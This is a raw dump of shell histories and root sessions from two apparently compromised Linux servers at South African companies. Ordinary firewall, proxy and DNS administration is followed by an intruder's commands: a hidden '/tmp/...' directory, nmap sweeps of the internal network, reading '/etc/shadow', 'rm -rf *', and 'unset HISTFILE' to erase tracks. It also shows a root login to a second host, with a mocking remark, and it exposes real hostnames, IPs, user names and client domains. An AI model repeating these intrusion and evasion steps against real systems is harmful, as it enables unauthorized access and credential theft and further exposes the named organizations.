427 bwm
428 dmesg
429 dmesg -c
430 dmesg
431 wget
432 lynx
433 lynx www.no-ip.com/client/linux/noip-duc-linux.tar.gz
434 tar zxvf noip-duc-linux.tar.gz
435 cd noip-2.1.1/
436 ll
437 make
438 make install
439 cd /
440 noip2 -C
441 ps -ef
442 ps -ef | grep noip
443 noip2 -?
444 noip2
445 ps -ef | grep noip
446 ifconfig
447 dmesg
448 dmesg -c
449 noip2
450 noip2 -?
451 dmesg -c
452 bwm
453 exit
454 /etc/init.d/named status
455 /etc/init.d/named
456 exit
457 cd noip-2.1.1/
458 ll
459 vi README.FIRST
460 cd /etc/init.d/
461 vi noip2
462 chkconfig
463 chkconfig --add noip2
464 ll
465 chmod +x noip2
466 chkconfig --add noip2
467 ll ..
468 ll
469 cd ..
470 cd rc.d
471 ll
472 cat rc
473 cd ..
474 man chkconfig
475 vi /root/noip-2.1.1/README.FIRST
476 grep initdefault /etc/inittab | awk -F: '{print $2}'
477 ln
478 ln --help
479 ln /etc/rc3.d/S99noip2 /etc/init.d/noip2
480 ln /etc/init.d/noip2 /etc/rc3.d/S99noip2
481 ln /etc/init.d/noip2 /etc/rc0.d/K20noip
482 chkconfig --list | grep on
483 chkconfig --del webmin
484 locate webmin | more
485 exit
486 cd /etc/
487 vi named.boot named.conf rndc.conf rndc.key
488 exit
489 cd /
490 tar zcvf thatcher.tgz etc/ var/named/
491 dig fw.singita.co.za
492 dig -x 196.7.8.54
493 dig -x 196.7.8.57
494 dig mx singita.co.za
495 tar zcvf thatcher.tgz etc/ var/named/ var/www/
496 cd /etc/init.d/
497 ln /etc/init.d/noip2 /etc/rc.d/rc0.d/K90noip2
498 ln /etc/init.d/noip2 /etc/rc.d/rc1.d/K90noip2
499 ln /etc/init.d/noip2 /etc/rc.d/rc2.d/S10noip2
500 ln /etc/init.d/noip2 /etc/rc.d/rc3.d/S90noip2
501 ln /etc/init.d/noip2 /etc/rc.d/rc2.d/K25noip2
502 rm /etc/rc.d/rc2.d/S10noip2
503 ln /etc/init.d/noip2 /etc/rc.d/rc4.d/S90noip2
504 ln /etc/init.d/noip2 /etc/rc.d/rc5.d/S90noip2
505 ln /etc/init.d/noip2 /etc/rc.d/rc6.d/K08noip2
506 ll
507 cd /
508 tar zcvf thatcher.tgz etc/ var/named/ var/www/
509 cd /etc/init.d/
510 exit
511 usname -u
512 uname -a
513 exit
514 /etc/init.d/squid status
515 exit
516 ifconfig
517 route
518 ping www.mweb.co.za
519 reboot
520 dmesg
521 dmesg -c
522 clear
523 dmesg -c
524 dmesg
525 ping www.mweb.co.za
526 dmesg
527 ping www.mweb.co.za
528 ping www.google.com
529 ping knysna.compumail.co.za
530 exit
531 top
532 clear
533 cd /var/log/squid
534 ls
535 ls -l
536 ls
537 ls -l
538 exit
539 dmesg
540 top
541 exit
542 dnsconf
543 netconf
544 drakconnect
545 exit
546 dmesg
547 ping www.mweb.co.za
548 /etc/init.d/named status
549 cd /etc/
550 vi named.conf
551 ping pop.woroldonline.co.za
552 ping pop.worldonline.co.za
553 telnet pop.worldonline.co.za 110
554 exit
555 dmesg
556 clear
557 dmesg
558 cd /etc/shorewall/
559 vi rules
560 dmesg
561 vi rules
562 shorewall check
563 shorewall restart
564 vi rules
565 exit
566 /etc/init.d/squid restart
567 dmesg -c
568 bwm
569 man lsd
570 lsd
571 lsof
572 man lsof
573 lsof | more
574 chkconfig --list | grep om
575 chkconfig --list | grep on
576 chkconfig --del numlock
577 chkconfig --del xfs
578 l
579 cd ..
580 ls of | more
581 lsof | more
582 man deffsd
583 man dvffsd
584 man devfsd
585 /etc/init.d/devfsd stop
586 lsof | more
587
588 /etc/init.d/xfs stop
589 exit
590 /etc/init.d/adsl
591 exit
592 dir
593 chdir /etc/init.d/adsl
594 help command
595 help dir
596 dir -l
597 help dir
598 dir -v
599 exit
600 lynx www.google.com
601 vi /etc/squid/squid.conf
602 auth_param basic program /usr/lib/squid/msnt_auth
603 /usr/lib/squid/msnt_auth
604 ls /usr/lib/squid/msnt_auth
605 ll /usr/lib/squid/msnt_auth
606 vi /etc/squid/msntauth.conf
607 cat /etc/hosts
608 ping server1
609 /usr/lib/squid/msnt_auth
610 dmesg -c
611 /usr/lib/squid/msnt_auth
612 dmesg -c
613 lsof | more
614 cd /usr/lib/squid/
615 ll
616 ls
617 ls ms*
618 ./msnt_auth
619 dmesg -c
620 reboot
621 exit
622 /etc/init.d/squid restart
623 vi /etc/squid/squid.conf
624 /usr/lib/squid/msnt_auth
625 /usr/lib/squid/msnt_auth -d
626 /usr/lib/squid/msnt_auth -D
627 vi /etc/squid/msntauth.conf
628 /usr/lib/squid/msnt_auth
629 dmesg
630 vi /etc/squid/msntauth.conf
631 /usr/lib/squid/msnt_auth
632 dig server1
633 ping server1
634 ping server2
635 vi /etc/squid/msntauth.conf
636 ssh 196.25.45.214
637 /usr/lib/squid/msnt_auth
638 exit
639 ifconfig
640 ping 196.25.1.1
641 netstat -rn
642 vi /etc/sysconfig/network
643 ifconfig
644 vi /etc/sysconfig/network
645 /etc/init.d/network restart
646 vi /etc/sysctl.conf
647 /etc/init.d/network restart
648 ping 196.25.1.1
649 netstat -rn
650 ping 192.168.1.1
651 lynx 192.168.1.1
652 ifconfig
653 lynx 192.168.1.10
654 ping 192.168.1.10
655 vi /etc/sysconfig/network
656 /etc/init.d/network restart
657 ping 196.25.1.1
658 lsof | grep no
659 chkconfig --list
660 chkconfig --list | grep on
661 ping www.google.com
662 ifconfig
663 lsof | grep squid
664 /etc/init.d/squid status
665 squid -z
666 squid -k check
667 /etc/init.d/squid start
668 squid -k check
669 /etc/init.d/squid start
670 /etc/init.d/squid restart
671 tail -f /var/log/squid/cache.log
672 tail -f /var/log/messages
673 /etc/init.d/squid stop
674 ps -ef | grep squid
675 dig server2
676 vi /etc/hosts
677 hostname
678 hostname -?
679 hostname -d office.histologic.co.za
680 hostname -d histofw.office.histologic.co.za
681 hostname histofw.office.histologic.co.za
682 hostname
683 vi /etc/hosts
684 cd /etc/
685 grep -r office.histologic.co.za * | more
686 vi resolv.conf
687 vi /etc/sysconfig/network
688 grep -r office.histologic.co.za[D * | more
689 grep -r "office.histologic.co.za[D" * | more
690 grep -r "office.histologic.co.za\[D" * | more
691 tail -f /var/log/squid/access.log
692 tail -f /var/log/messages
693 cat /etc/hosts
694 vi /etc/hosts
695 exit
696 cd /etc/rc.d/init.d/
697 ll noip2
698 vi noip2
699 exit
700 vi /etc/shorewall/rules
701 vi /etc/squid/squid.conf
702 squid -k reconfigure
703 exit
704 /etc/init.d/squid restart
705 dmesg -c
706 vi /etc/squid/squid.conf
707 squid -k reconfigure
708 dmesg -c
709 cd /etc/squid/
710 vi msntauth.conf
711 vi /etc/hosts
712 squid -k reconfigure
713 /usr/lib/squid/msnt_auth
714 vi /etc/squid/
715 cat msntauth.conf
716 ping server1
717 ping server2
718 vi /etc/hosts
719 /usr/lib/squid/msnt_auth
720 tail -f /var/log/messages
721 /usr/lib/squid/msnt_auth
722 tail -f /var/log/messages
723 vi /etc/squid/msntauth.conf
724 cat server1 /etc/hosts
725 vi /etc/squid/msntauth.conf
726 cat server1 /etc/hosts
727 vi /etc/hosts
728 vi /etc/squid/msntauth.conf
729 dmesg -c
730 /usr/lib/squid/msnt_auth
731 /etc/init.d/squid stop
732 /usr/lib/squid/msnt_auth
733 exit
734 reboot
735 cd /var/named/
736 ll
737 vi /etc/named.conf
738 dig www.google.com
739 vi /etc/named.conf
740 ifconfig
741 netstat -rn
742 vi /etc/named.conf
743 /etc/init.d/named restart
744 ifconfig
745 /etc/init.d/named restart
746 ll
747 ifconfig /usr/lib/squid/msnt_auth
748 /usr/lib/squid/msnt_auth
749 /etc/init.d/squid restart
750 ext
751 exit
752 dmesg -c
753 cd /var/named/
754 ll
755 rm office.histologic.co.za.hosts
756 rndc reload
757 ll
758 /etc/init.d/named restart
759 ll
760 /etc/init.d/squid stop
761 /usr/lib/squid/msnt_auth
762 ll
763 rndc -?
764 rndc reload
765 ll
766 cat /etc/named.conf
767 rndc reload office.histologic.co.za
768 ll
769 tail -f /var/log/messages
770 vi /etc/named.conf
771 /etc/init.d/named restart
772 vi /etc/hosts
773 vi /etc/squid/squid.conf
774 cd /etc/squid/
775 ll /var/named/
776 rndc reload office.histologic.co.za
777 ssh 196.15.249.214
778 dmesg -c
779 vi /etc/sysctl.conf
780 exit
781 dmesg -c
782 cd /etc/
783 vi named.conf
784 ifconfig
785 vi named.conf
786 rmdc reload
787 rndc reload
788 /etc/init.d/named restart
789 vi /etc/shorewall/rules
790 shorewall restart
791 dmesg -c
792 tcpdump -i eth0
793 tcpdump -i eth0 not tcp port 22
794 dmesg -x
795 dmesg -c
796 dig plet.compumail.co.za
797 telnet plet.compumail.co.za 110
798 exit
799 traceroute -n 196.15.249.203
800 exit
801 passwd
802 exit
803 dir
804 exit
805 dir
806 exit
807 cd /etc/squid/
808 vi msntauth.conf
809 exit
810 cd /etc/shorewall/
811 vi rules
812 vi interfaces
813 ifconfig
814 vi interfaces
815 vi rules
816 vi /etc/services
817 vi rules
818 shorewall restart
819 tailf -f /var/log/messages
820 tail -f /var/log/messages
821 vi rules
822 shorewall restart
823 vi rules
824 shorewall restart
825 vi rules
826 shorewall restart
827 exit
828 cd /etc/squid/
829 vi msntauth.conf
830 cat msntauth.conf
831 md /usr/local/squid
832 md /usr/local/squid/etc
833 exit
834 tail -f /var/log/messages
835 tail -f /var/log/messages | grep 196.15.249.205
836 ifconfig
837 ssh plet.compumail.co.za
838 telnet plet.compumail.co.za 110
839 telnet lin02.compumail.co.za 110
840 cd /etc/shorewall/
841 vi rules
842 tail -f /var/log/messages
843 exit
844 tail -f /var/log/messages
845 ping 192.168.0.1
846 vi /etc/shorewall/rules
847 tail -f /var/log/messages
848 vi /etc/shorewall/rules
849 shorewall restart
850 tail -f /var/log/messages
851 vi /etc/shorewall/rules
852 cat /var/log/messages
853 vi /etc/shorewall/rules
854 ifconfig
855 vi /etc/shorewall/rules
856 shorewall restart
857 vi /etc/shorewall/rules
858 cd /etc/shorewall/
859 vi policy
860 vi interfaces
861 tail -f /var/log/messages
862 tcpdump
863 tcpdump -ni eth1
864 tcpdump -ni eth0
865 tail -f /var/log/kernel/
866 tail -f /var/log/syslog
867 tail -f /var/log/messages
868 exit
869 locate msnt
870 cd /etc/squid/
871 ll
872 vi msntauth.conf
873 /etc/init.d/named status
874 /etc/init.d/named restart
875 ifcconfig
876 iconfig
877 ifconfig
878 tail -f /var/log/messages
879 clear
880 tail -f /var/log/messages
881 vi /etc/shorewall/rules
882 tail -f /var/log/messages
883 ssh knysna.compumail.co.za
884 ssh plet.compumail.co.za
885 ping plet.copmumail.co.za
886 ping www.mweb.co.za
887 ssh plet.compumail.co.za
888 ping plet.compumail.co.za
889 vi /etc/shorewall/rules
890 exit
891 tail -f /var/log/messages
892 telnet plet.compumail.co.za 110
893 vi /etc/shorewall/rules
894 tail -f /var/log/messages
895 dmesg -c
896 clear
897 tail -f /var/log/messages
898 /etc/init.d/shorewall stop
899 /etc/init.d/shorewall start
900 tail -f /var/log/messages
901 vi /etc/sysctl.conf
902 vi /etc/shorewall/masq
903 ifconfig
904 vi /etc/shorewall/masq
905 ifconfig
906 vi /etc/shorewall/masq
907 cd /etc/shorewall/
908 shorewall restart
909 tail -f /var/log/messages
910 passwd joe
911 tail -f /var/log/messages
912 vi masq
913 shorewall restart
914 exiyt
915 eexit
916 exit
917 ifconfig
918 netstat -rn
919 cd /etc/shorewall/
920 vi masq
921 vi policy
922 vi interfaces
923 vi policy
924 vi rules
925 shorewall restart
926 dmesg -c
927 ifconfig
928 vi /etc/sysctl.conf
929 w
930 uname -a
931 cat /etc/*-release
932 w
933 ls
934 df -h
935 cat .bash_history
936 w
937 irssi
938 BitchX
939 cd /tmp
940 mkdir ...
941 chmod 700 ...
942 cd ...
943 ls
944 wget http://irssi.org/files/irssi-0.8.9.tar.gz
945 ftp ftp.irssi.org
946 exit
947 cd /tmp/...
948 ls
949 tar xzf *
950 cd *
951 ls
952 ./configure && make && make install
953 irssi --help
954 irssi -v
955 opensls
956 openssl
957 ./configure --help | grep ssl
958 grep ssl *
959 cd ..
960 ls
961 ifconfig
962 irssi
######## WHAT THE FUCK!? ###############
963 adduser talon
964 passwd talon
965 su talon
966 userdel talon
967 userdel -r talon
968 rm -rf /home/talon
######## WHAT THE FUCK!? ###############
969 ls
970 rm -rf *
971 w
972 cat ~/.ssh/known_hosts
973 ifconfig
974 nmap
975 ls
976 locate nmap
977 cat /etc/shadow
978 w
979 ls
980 exit
981 cd /tmp/...
982 ls
983 tar xzf *
984 cd *
985 ls
986 clear
987 ./configure && make && make install
988 cd ..
989 rm -rf *
990 nmap
991 clear
992 nmap -sP 192.168.0.1/24
993 clear
994 nmap -sS -sV -p 22 -P0 192.168.0.1/24
995 clear
996 nmap -sS -sV -P0 192.168.0.1/24 -oN nmap.log
997 clear
998 w
999 ls
1000 exit
1001 unset HISTFILE
1002 w
1003 ls -al
1004 history
[root@histofw root]#
[root@histofw root]#
[root@histofw root]#
[root@histofw root]# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 1580 472 ? S 2004 0:03 init [3]
root 2 0.0 0.0 0 0 ? SW 2004 0:00 [migration/0]
root 3 0.0 0.0 0 0 ? SWN 2004 0:00 [ksoftirqd/0]
root 4 0.0 0.0 0 0 ? SW 2004 0:00 [migration/1]
root 5 0.0 0.0 0 0 ? SWN 2004 0:00 [ksoftirqd/1]
root 6 0.0 0.0 0 0 ? SW< 2004 0:00 [events/0]
root 7 0.0 0.0 0 0 ? SW< 2004 0:00 [events/1]
root 8 0.0 0.0 0 0 ? SW< 2004 2:40 [kblockd/0]
root 9 0.0 0.0 0 0 ? SW< 2004 2:38 [kblockd/1]
root 10 0.0 0.0 0 0 ? SW 2004 0:00 [kirqd]
root 13 0.0 0.0 0 0 ? SW 2004 4:06 [kswapd0]
root 14 0.0 0.0 0 0 ? SW< 2004 0:00 [aio/0]
root 15 0.0 0.0 0 0 ? SW< 2004 0:00 [aio/1]
root 17 0.0 0.0 0 0 ? SW 2004 0:00 [kseriod]
root 25 0.0 0.0 0 0 ? SW 2004 0:47 [kjournald]
root 115 0.0 0.3 2040 936 ? S 2004 0:01 devfsd /dev
root 205 0.0 0.0 0 0 ? SW 2004 0:00 [khubd]
root 1936 0.0 0.0 1656 236 ? S 2004 0:00 /sbin/ifplugd -w
root 2010 0.0 0.1 1656 292 ? S 2004 0:00 /sbin/ifplugd -w
root 2086 0.0 0.1 1644 412 ? S 2004 0:13 syslogd -m 0 -a /
root 2094 0.0 0.1 2604 304 ? S 2004 0:05 klogd -2
daemon 2126 0.0 0.1 1620 276 ? S 2004 0:00 /usr/sbin/atd
root 2180 0.0 1.0 2664 2664 ? SL 2004 0:01 ntpd -A
root 2219 0.0 0.1 2172 508 ? S 2004 0:00 xinetd -stayalive
root 2287 0.0 0.1 1632 256 ? S 2004 0:01 crond
root 2307 0.0 0.0 2240 192 ? S 2004 0:00 /usr/sbin/fwlogwa
root 2357 0.0 0.0 5484 244 ? S 2004 0:00 squid -D
squid 2359 0.0 23.8 89264 60496 ? S 2004 22:12 (squid) -D
squid 2369 0.0 0.0 1424 36 ? S 2004 0:00 (unlinkd)
squid 2440 0.0 0.0 2400 160 ? S 2004 1:39 diskd 2415616 241
root 2518 0.0 0.7 11332 2028 ? S 2004 0:03 httpd2 -f /etc/ht
nobody 2609 0.0 0.1 1904 492 ? S 2004 0:01 /usr/local/bin/no
root 2615 0.0 0.0 1576 128 tty1 S 2004 0:00 /sbin/mingetty tt
root 2616 0.0 0.1 1576 308 tty2 S 2004 0:00 /sbin/mingetty tt
root 2617 0.0 0.0 1576 124 tty3 S 2004 0:00 /sbin/mingetty tt
root 2618 0.0 0.0 1576 124 tty4 S 2004 0:00 /sbin/mingetty tt
root 2619 0.0 0.0 1576 120 tty5 S 2004 0:00 /sbin/mingetty tt
root 2620 0.0 0.0 1576 136 tty6 S 2004 0:00 /sbin/mingetty tt
root 20328 0.0 0.2 4032 516 ? S Jun01 0:00 /usr/bin/perl /us
apache 20381 0.0 1.2 11412 3116 ? S Jun01 0:00 httpd2 -f /etc/ht
apache 20382 0.0 1.1 11560 2944 ? S Jun01 0:00 httpd2 -f /etc/ht
apache 20383 0.0 1.5 11560 3816 ? S Jun01 0:00 httpd2 -f /etc/ht
apache 20384 0.0 0.8 11412 2188 ? S Jun01 0:00 httpd2 -f /etc/ht
apache 20385 0.0 0.7 11412 1976 ? S Jun01 0:00 httpd2 -f /etc/ht
root 1968 0.0 0.0 0 0 ? SW Jun06 0:00 [pdflush]
named 9497 0.0 1.2 38792 3176 ? S Jun07 0:00 named -u named
squid 17543 0.0 0.2 2104 616 ? S Jun12 0:00 (msnt_auth)
squid 17547 0.0 0.2 2104 536 ? S Jun12 0:00 (msnt_auth)
squid 17549 0.0 0.2 2104 532 ? S Jun12 0:00 (msnt_auth)
squid 17550 0.0 0.2 2104 532 ? S Jun12 0:00 (msnt_auth)
squid 17551 0.0 0.2 2104 536 ? S Jun12 0:00 (msnt_auth)
apache 7468 0.0 1.2 11412 3224 ? S Jun12 0:00 httpd2 -f /etc/ht
apache 7469 0.0 1.2 11412 3224 ? S Jun12 0:00 httpd2 -f /etc/ht
apache 7470 0.0 1.2 11412 3224 ? S Jun12 0:00 httpd2 -f /etc/ht
root 20821 0.0 0.0 0 0 ? SW 04:36 0:00 [pdflush]
root 27630 0.0 0.5 3336 1424 ? S 05:43 0:00 /usr/sbin/sshd
root 27946 0.0 0.6 6052 1712 ? S 07:30 0:00 sshd: root@pts/0
root 27948 0.0 0.6 2780 1624 pts0 S 07:30 0:00 -bash
root 28001 0.0 0.3 2424 784 pts0 R 07:36 0:00 ps aux
[root@histofw root]# ls -al //home/
total 12
drwxr-xr-x 3 root root 4096 Jun 12 05:27 ./
drwxr-xr-x 18 root adm 4096 Nov 25 2004 ../
drwx--x--x 3 joe joe 4096 Jun 10 13:18 joe/
[root@histofw root]# host
Usage: host [-aCdlrTwv] [-c class] [-n] [-N ndots] [-t type] [-W time]
[-R number] hostname [server]
-a is equivalent to -v -t *
-c specifies query class for non-IN data
-C compares SOA records on authoritative nameservers
-d is equivalent to -v
-l lists all hosts in a domain, using AXFR
-i Use the old IN6.INT form of IPv6 reverse lookup
-N changes the number of dots allowed before root lookup is done
-r disables recursive processing
-R specifies number of retries for UDP packets
-t specifies the query type
-T enables TCP/IP mode
-v enables verbose output
-F Don't get next server when the first one got a SERVFAIL
-w specifies to wait forever for a reply
-W specifies how long to wait for a reply
[root@histofw root]# hostname
histofw.office.histologic.co.za
[root@histofw root]# cat /root/.ssh/known_hosts
[root@histofw root]# ls -al /tmp/.../
total 16
drwx------ 2 root root 4096 Jun 12 06:03 ./
drwxrwxrwt 6 root root 4096 Jun 14 05:14 ../
-rw-r--r-- 1 root root 5595 Jun 12 14:30 nmap.log
[root@histofw root]# cat /tmp/.../nmap.log
# nmap 3.81 scan initiated Sun Jun 12 06:03:16 2005 as: nmap -sS -sV -P0 -oN nmap.log
192.168.0.1/24
All 1663 scanned ports on 192.168.0.0 are: filtered
All 1663 scanned ports on server1.office.histologic.co.za (192.168.0.1) are: filtered
MAC Address: 00:D0:B7:B7:AE:1B (Intel)
All 1663 scanned ports on 192.168.0.2 are: filtered
All 1663 scanned ports on 192.168.0.3 are: filtered
All 1663 scanned ports on 192.168.0.4 are: filtered
All 1663 scanned ports on 192.168.0.5 are: filtered
All 1663 scanned ports on 192.168.0.6 are: filtered
All 1663 scanned ports on 192.168.0.7 are: filtered
All 1663 scanned ports on 192.168.0.8 are: filtered
All 1663 scanned ports on 192.168.0.9 are: filtered
Interesting ports on histofw.office.histologic.co.za (192.168.0.10):
(The 1657 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.6.1p2 (protocol 1.99)
53/tcp open domain ISC Bind 9.2.3
80/tcp open http Apache Advanced Extranet Server httpd 2.0.48
110/tcp open pop3 UW Imap pop3 server 2003.83mdk
443/tcp open ssl/http Apache Advanced Extranet Server httpd 2.0.48
3128/tcp open http-proxy Squid webproxy 2.5.STABLE4
All 1663 scanned ports on 192.168.0.11 are: filtered
All 1663 scanned ports on 192.168.0.12 are: filtered
All 1663 scanned ports on 192.168.0.13 are: filtered
All 1663 scanned ports on 192.168.0.14 are: filtered
All 1663 scanned ports on 192.168.0.15 are: filtered
All 1663 scanned ports on 192.168.0.16 are: filtered
All 1663 scanned ports on 192.168.0.17 are: filtered
All 1663 scanned ports on 192.168.0.18 are: filtered
All 1663 scanned ports on 192.168.0.19 are: filtered
All 1663 scanned ports on 192.168.0.20 are: filtered
All 1663 scanned ports on 192.168.0.21 are: filtered
All 1663 scanned ports on 192.168.0.22 are: filtered
All 1663 scanned ports on 192.168.0.23 are: filtered
All 1663 scanned ports on 192.168.0.24 are: filtered
All 1663 scanned ports on 192.168.0.25 are: filtered
All 1663 scanned ports on 192.168.0.26 are: filtered
All 1663 scanned ports on 192.168.0.27 are: filtered
All 1663 scanned ports on 192.168.0.28 are: filtered
All 1663 scanned ports on 192.168.0.29 are: filtered
All 1663 scanned ports on 192.168.0.30 are: filtered
All 1663 scanned ports on 192.168.0.31 are: filtered
All 1663 scanned ports on 192.168.0.32 are: filtered
All 1663 scanned ports on 192.168.0.33 are: filtered
All 1663 scanned ports on 192.168.0.34 are: filtered
All 1663 scanned ports on 192.168.0.35 are: filtered
All 1663 scanned ports on 192.168.0.36 are: filtered
All 1663 scanned ports on 192.168.0.37 are: filtered
All 1663 scanned ports on 192.168.0.38 are: filtered
All 1663 scanned ports on 192.168.0.39 are: filtered
All 1663 scanned ports on 192.168.0.40 are: filtered
All 1663 scanned ports on 192.168.0.41 are: filtered
All 1663 scanned ports on 192.168.0.42 are: filtered
All 1663 scanned ports on 192.168.0.43 are: filtered
All 1663 scanned ports on 192.168.0.44 are: filtered
All 1663 scanned ports on 192.168.0.45 are: filtered
All 1663 scanned ports on 192.168.0.46 are: filtered
MAC Address: 00:0F:20:23:0E:30 (Hewlett Packard)
All 1663 scanned ports on 192.168.0.47 are: filtered
All 1663 scanned ports on 192.168.0.48 are: filtered
All 1663 scanned ports on 192.168.0.49 are: filtered
All 1663 scanned ports on 192.168.0.50 are: filtered
All 1663 scanned ports on 192.168.0.51 are: filtered
All 1663 scanned ports on 192.168.0.52 are: filtered
All 1663 scanned ports on 192.168.0.53 are: filtered
All 1663 scanned ports on 192.168.0.54 are: filtered
All 1663 scanned ports on 192.168.0.55 are: filtered
All 1663 scanned ports on 192.168.0.56 are: filtered
All 1663 scanned ports on 192.168.0.57 are: filtered
All 1663 scanned ports on 192.168.0.58 are: filtered
All 1663 scanned ports on 192.168.0.59 are: filtered
All 1663 scanned ports on 192.168.0.60 are: filtered
All 1663 scanned ports on 192.168.0.61 are: filtered
All 1663 scanned ports on 192.168.0.62 are: filtered
All 1663 scanned ports on 192.168.0.63 are: filtered
All 1663 scanned ports on 192.168.0.64 are: filtered
All 1663 scanned ports on 192.168.0.65 are: filtered
All 1663 scanned ports on 192.168.0.66 are: filtered
All 1663 scanned ports on 192.168.0.67 are: filtered
All 1663 scanned ports on 192.168.0.68 are: filtered
All 1663 scanned ports on 192.168.0.69 are: filtered
All 1663 scanned ports on 192.168.0.70 are: filtered
All 1663 scanned ports on 192.168.0.71 are: filtered
All 1663 scanned ports on 192.168.0.72 are: filtered
All 1663 scanned ports on 192.168.0.73 are: filtered
All 1663 scanned ports on 192.168.0.74 are: filtered
All 1663 scanned ports on 192.168.0.75 are: filtered
All 1663 scanned ports on 192.168.0.76 are: filtered
All 1663 scanned ports on 192.168.0.77 are: filtered
All 1663 scanned ports on 192.168.0.78 are: filtered
All 1663 scanned ports on 192.168.0.79 are: filtered
All 1663 scanned ports on 192.168.0.80 are: filtered
All 1663 scanned ports on 192.168.0.81 are: filtered
All 1663 scanned ports on 192.168.0.82 are: filtered
All 1663 scanned ports on 192.168.0.83 are: filtered
All 1663 scanned ports on 192.168.0.84 are: filtered
All 1663 scanned ports on 192.168.0.85 are: filtered
All 1663 scanned ports on 192.168.0.86 are: filtered
All 1663 scanned ports on 192.168.0.87 are: filtered
All 1663 scanned ports on 192.168.0.88 are: filtered
All 1663 scanned ports on 192.168.0.89 are: filtered
All 1663 scanned ports on 192.168.0.90 are: filtered
[root@histofw root]# ls -al /var/tmp/
total 12
drwxrwxrwt 3 root root 4096 Jun 14 04:07 ./
drwxr-xr-x 21 root root 4096 May 12 2004 ../
drwx------ 4 root root 4096 May 13 2004 kdecache-root/
[root@histofw run]#
[root@histofw run]# cd /home/joe/
[root@histofw joe]# ls -al
total 36
drwx--x--x 3 joe joe 4096 Jun 10 13:18 ./
drwxr-xr-x 3 root root 4096 Jun 12 05:27 ../
-rw------- 1 joe joe 3 Jun 10 13:18 .bash_history
-rw-r--r-- 1 joe joe 24 May 12 2004 .bash_logout
-rw-r--r-- 1 joe joe 191 May 12 2004 .bash_profile
-rw-r--r-- 1 joe joe 124 May 12 2004 .bashrc
-rw-r--r-- 1 joe joe 141 May 12 2004 .mailcap
-rw-r--r-- 1 joe joe 3729 May 12 2004 .screenrc
drwx------ 2 joe joe 4096 May 12 2004 tmp/
[root@histofw joe]# cat .bash_history
su
[root@histofw joe]# cat /etc/shadow
------------------------------------
skew @ knysna: absolutely nothing here just some lame hacking attempts it seems.
------------------------------------
login as: root
root@knysna.compumail.co.za's password:
Last login: Tue Jun 14 01:42:21 2005 from dsl-5-37.sg-b.tiscali.no
[root@knysna root]# w
06:49:22 up 63 days, 14:35, 2 users, load average: 0.09, 0.03, 0.00
USER TTY LOGIN@ IDLE JCPU PCPU WHAT
root vc/1 01Jun05 5days 0.03s 0.03s -bash
root pts/0 Mon09 18:39m 0.03s 0.03s -bash
[root@knysna root]# uname unset HISTFILE
[root@knysna root]# uname -a ; cat /etc/issue
Linux knysna 2.6.3-7mdk-p3-smp-64GB #1 SMP Wed Mar 17 15:34:39 CET 2004 i686 unknown
unknown GNU/Linux
Mandrake Linux release 10.0 (Official) for i586
Kernel 2.6.3-7mdk-p3-smp-64GB on a Dual-processor i686 / \l
[root@knysna root]# history
4 dig www.anchorrand.com
5 exit
6 bwm
7 exit
8 bwm
9 tcpdump -ni wp7aft
10 exit
11 bwm
12 wanrouter status
13 bwm
14 exit
15 ping www.logisticor.com
16 dig www.logisticor.com @196.25.1.1
17 dig www.logisticor.com @196.25.1.11
18 dig www.logisticor.com @induna.saix.net
19 dig www.logisticor.com @igubu.saix.net
20 /etc/init.d/named
21 /etc/init.d/named restart
22 dig www.logisticor.com @196.15.249.203
23 dig www.logisticor.com @196.15.249.204
24 exit
25 dig www.logisticor.com @196.15.249.204
26 dig www.logisticor.com @196.15.249.203
27 dig www.logisticor.com @192.168.20.2
28 dig logisticor.com @192.168.20.2
29 dig www.logisticor.com @192.168.20.2
30 dig www.logisticor.com @196.15.249.204
31 dig www.logisticor.com @induna.saix.net
32 exit
33 bwm
34 exit
35 dmesg | grep 196.25.45.221
36 dmesg -c
37 clear
38 tail -f /var/log/messages
39 tail -f /var/log/messages | grep 196.25.45.221
40 route
41 route add -net 196.25.45.220 netmask 25.255.255.252 gw 196.15.249.205
42 route add -net 196.25.45.220 netmask 255.255.255.252 gw 196.15.249.205
43 route
44 exit
45 cat /etc/services | grep https
46 exit
47 vi /etc/in
48 vi /var/named/
49 vi /var/named/logisticor.com
50 rndc reload
51 dig ftp.logisticor.com
52 ping ftp.logisticor.com
53 vi /var/named/logisticor.com
54 rndc reload
55 ping ftp.logisticor.com
56 dig ftp.logisticor.com
57 vi /var/named/logisticor.com
58 rndc reload
59 dig ftp.logisticor.com
60 ping ftp.logisticor.com
61 exit
62 dig www.logisticor.com
63 cd /var/named/
64 ls
65 vi logisticor.com
66 rcdc reload
67 rndc reload
68 dig www.logisticor.com\
69 dig www.logisticor.com
70 /etc/init.d/named restart
71 dig www.logisticor.com
72 vi namerd
73 vi named.
74 vi logisticor.com
75 dig www.logisticor.com
76 cd /var/named/
77 vi compumail.co.za
78 ll
79 dig alltransportneeds.co.za
80 dig atn.co.za
81 dig atn.com
82 exit
83 vi /var/named/parktonian.co.za
84 rndc reload parktonian.co.za
85 dig www.parktonian.co.za
86 exit
87 bwm
88 exit
89 cd /var/named/
90 cat gea-westfalia.co.za
91 vi gea-westfalia.co.za
92 rncd reload gea-westfalia.co.za
93 rndc reload gea-westfalia.co.za
94 dig gea-westfalia.co.za
95 vi gea-westfalia.co.za
96 exit
97 cd /var/named/
98 ls
99 vi logisticor.com
100 rndc reload
101 dig www.logisticor.com
102 ping www.logisticor.com
103 dig www.logisticor.com
104 vi logisticor.com
105 /etc/init.d/named resatrt
106 /etc/init.d/named resatart
107 /etc/init.d/named restart
108 dig www.logisticor.com\
109 dig www.logisticor.com
110 dig logisticor.com
111 dig www.logisticor.com
112 ping web01.compumail.co.za
113 vi logisticor.com
114 /etc/init.d/named resatart
115 /etc/init.d/named restart
116 rndc reload
117 dig www.logisticor.com
118 exit
119 cd /etc/sysconfig/network-scripts/
120 ll
121 vi ifcfg-eth0
122 ll
123 ifconfig
124 exit
125 ifconfig | more
126 exit
127 bwm
128 tcpdump -ni wp7aft
129 tcpdump -i wp7aft
130 exit
131 bwm
132 ssh 196.15.249.254
133 bwm
134 dig mail.tiscpty.com
135 cd /var/named/
136 vi khuphukani.co.za
137 passwd kh_info
138 vi khuphukani.co.za
139 rndc reload
140 /etc/init.d/named resatrt
141 /etc/init.d/named restart
142 exit
143 ssh joe@165.146.35.51
144 ssh parktonian.no-ip.info
145 exit
146 cd /var/named/
147 vi geospace.co.za
